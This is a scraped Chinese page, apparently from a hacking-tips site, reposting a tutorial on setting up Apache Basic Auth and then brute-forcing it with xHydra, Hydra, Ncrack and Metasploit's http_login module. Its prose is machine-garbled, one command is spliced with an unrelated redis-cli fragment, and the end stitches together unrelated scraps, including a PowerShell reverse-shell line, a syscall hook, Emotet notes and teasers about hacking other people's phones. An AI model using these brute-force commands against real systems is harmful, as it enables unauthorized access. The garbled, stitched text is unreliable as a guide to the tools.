在这篇文章中,我们会告知我们怎么维护Apache Web服务器免受未经身份验证的用户不合法拜访,以及怎么躲藏要害中心信息不被不合法用户
查看到。当然了,我们还会介绍怎么运用这些安全缺点来浸透方针服务器,信任这也是我们十分感兴趣的东西。HTTP基础认证(BA)在HTTP事务处理环境中,基础拜访身份认证是HTTP用户署理在央求供给用户名和暗码时需求运用到的一种安全办法。
实际上,HTTP基础认证(BA)是完成对Web资源拜访控制的一种最简略的技能,由于它不需求规划cookie、会话辨认符或登录页面,HTTP基础认证是需求运用到HTTP头中的规范字段,并且还不需求进行握手。
可是,BA机制不会为凭据的传输供给机密性维护。它只会在传输过程中对相关信息进行Base64编码,而不会选用任何方式的加密。因而,HTTPS一般需求结合BA一同运用。
试验环境建立1、 Apache服务器(Ubuntu 14.04)
2、 浸透检验设备(Kali Linux)
3、 设置暗码认证
4、 设备Apache有用东西包
运用下列指令设备Apache2有用包:
sudo apt-get install apache2 apache2-utils
创建暗码文件运用htpasswd指令创建暗码文件,Apache将会用它来验证用户身份:
sudo htpasswd -c /etc/apache2/.htpasswd raj
cat /etc/apache2/.htpasswd
gedit etc/apache2/sites-enabled/000-default.conf
在虚拟主机设置中装备拜访控制
将下列装备内容保存到000-default.conf文件中:
<Directory "/var/www/html">
AuthType Basic
AuthName "Restricted Content"
AuthUserFile /etc/apache2/.htpasswd
Require valid-user
</Directory>
运用.htaccess文件装备拜访控制翻开Apache装备文件,批改.htaccess文件来启用暗码维护,添加下列代码:
sudo gedit /etc/apache2/apache2.conf
ServerName localhost
将AllowOverride参数批改为“All”,保存并重启Apache服务:
<Directory /var/www/>
Options Indexes FollowSymLinks
AllowOverride All
Require all granted
</Directory>
现在,我们需求往受限目录中添加一个.htaccess文件。这儿我们给整个网站添加约束,当然了,你也能够约束独自目录:
sudo nano /var/www/html/.htaccess
AuthType Basic
AuthName "Restricted Content"
AuthUserFile /etc/apache2/.htpasswd
Require valid-user
sudo service apache2 restart
承认暗码认证在浏览器中检验拜访受限资源,承认你的内容已受维护。这儿会弹出如下所示的验证框:
假如你拜访的内容没有弹出认证窗,或许你取消了认证页面,那你将会看到401未授权拜访过错。
输入正确的用户名和暗码之后,你就应该能够拜访网站内容了:
运用HTTP认证缝隙xHydra这是一款通过FTP端口和字典侵犯侵略系统的图形化东西,在Kali中翻开xHydra,选择“Single Target option”,设置方针IP,其他按下图勾选:
Passwords标签页装备如下,装备好字典文件:
切换到Start标签,点击“Start”,能够看到字典侵犯的进展以及终究的成果:
HydraHydra能够针对50种协议进行快速的字典侵犯,其间包含telnet、ftp、http、https、 *** b以及多种502BD7662A553397BBDCFA27B585D740A20C49FC数据库。操作指令如下:
hydra -L user.txt -P pass.txt 192.168.0.105 http-get
NcrackNcrack是一款高速 *** 认证破解东西,它能够协助企业检验 *** 安全状况,并辨认弱暗码。操作指令如下:
ncrack -U user.txt登录redis并批改其装备 redis-cli -h 192.168.192.133 -P pass.txt http://192.168.0.105
Metasploit下面这个模块能够对HTTP认证服务进行侵犯,翻开Kali终端,输入“msfconsole”,然后输入下列指令:
use auxiliary/scanner/http/http_login
msf auxiliary(scanner/http/http_login) > set user_file user.txt
msf auxiliary(scanner/http/http_login) > set pass_file pass.txt
msf auxiliary(scanner/http/http_login) > set rhosts 192.168.0.105
msf auxiliary(scanner/http/http_login) > set stop_on_success
msf auxiliary(scanner/http/http_login) > exploit
跋文期望这篇文章的内容能够协助我们了解HTTP弱装备的安全风险,并协助我们更好地提高自己网站的安全性。
* 参阅来历:hackingarticles,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM
黑客技术渠道:多种测验HTTP身份验证的办法
研究人员通过CNMAE域名记载接收了子域,并将一切到主机的央求到非注册的Azure的子域。通过一个一般的Azure账户,就能够注册一个子域并添加对应的主机名(host name)。这样就能够控制主机上的内容。2) 云控作业部分 :多种测试HTTP身份验证的 ***
黑客技术平台创建检验项目后,下一步是设置代码签名证书。首要,翻开Xcode首选项,然后选择“Accounts”。要添加Apple ID帐户,请单击左下角的加号并登录你的帐户。然后单击右下角的“Manage Certificates”。5. 通过在保存ADB和Fastboot二进制文件的同一目录中翻开指令提示符/Power Shell/Terminal,并根据你其时的操作系统输入以下指令,保证你的PC能够正常辨认你的Pixel 3手机:最近,在出名的Emotet银行木马中发现了一个生动的活动,它运用了免费系统东西但目的不明。 US-CERT本年(2018年)发布了针对这个特定版其他Emotet的警报,提到其运用了NirSoft Password-Recovery东西。手动删去此文件会在 5 秒钟后重现生成出现。
由于大多数Linux操作系统都设备了netcat,是以能够或许将提权后的敕令提高为root shell。根除结束后终究还得copy或许重装正常的系统指令。2.有缝隙的IoT装备黑客技术平台
控制端实行:9.6.3
4. SQL注入
在侵犯机器中设备好python 2.6.6和pywin32,并设置好python的环境变量,以便我们在cmd中运用。该研讨团队的Siamak Shahandashti博士标明:“这就好比是在玩拼图相同,你所得到的信息越多,你就能够越快拼出无缺的图。”$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
多种测试HTTP身份验证的 ***黑客技术平台-trigger 标明主题中你想用来触发规则的指令action = iptables[name=SSH, port=ssh, protocol=tcp] #动作的相关参数,对应action.d/iptables.conf文件
斐讯K1之所以能免费,有两大“秘籍”。一是附赠的铃铛卡,第二个是关键,待会再说。
声明:本文仅仅是入门和基础,你需求根据自己的需求来扩展。
sys_call_table[__NR_mkdir] = fake_mkdir;黑客技术平台正如你所了解的那样,USB交互设备和USB存储器这两大类USB设备是现在我们运用最为广泛的。
公有云运维安全四大风险第四步:多种测试HTTP身份验证的 ***"id": redacted,这儿我现已知道了机器的IP地址,不过由于network::arp Brik的存在你能够通过在vboxnet0接口上进行ARP扫描来获得IP地址。7、我国#Blockip/net(subnet)
本文标题:黑客技术渠道:多种测验HTTP身份验证的办法
“倾家荡产,是你自己的错!” — —某黑客 加密货币难以追踪,且在大多数情况下,加密货币也是不受管制的,它基于一个去中心化的区块链网络。这意味着一旦加密货币被盗,就基本上不可能找回了。So...
一款简洁的广告跳转安全警告提示HTML源码 做网站的基本是靠广告营收,源码的作用主要就是提示用户这是第三方广告,交易前请谨慎。把文件传到根目录 然后挂广告的链接格式:http://你的...
支付宝蚂蚁庄园小课堂10月1日每日一题答案是什么?支付宝蚂蚁庄园小课堂每天的凌晨更新一道题目,答对后能领取小鸡饲料,今天的问题是“唐朝时人们过中秋节,也会有假期吗?”不知道答案的朋友不妨随三大妈小编一...
本文目录一览: 1、历史上最著名的几次黑客事件 2、世界黑客谁能与阿桑奇比肩? 3、你认识地球上已知的十位电脑最强黑客吗? 4、加里·麦金农的介绍 5、国外著名的黑客团队有哪些 历史...
本文导读目录: 1、关于电影《黑客帝国》动画版! 2、黑客帝国3:矩阵革命高清完整版下载 3、黑客帝国 4、黑客帝国2:重装上阵完整版电影 5、黑客帝国1高清完整版下载 6、博大精...
本文导读目录: 1、怎么在手机上把别人的手机号拉进黑名单? 2、怎么能黑了别人的手机 3、用手机黑进别人的手机? 4、怎样黑别人的手机? 5、怎么能黑进别人的手机看照片 6、用手机...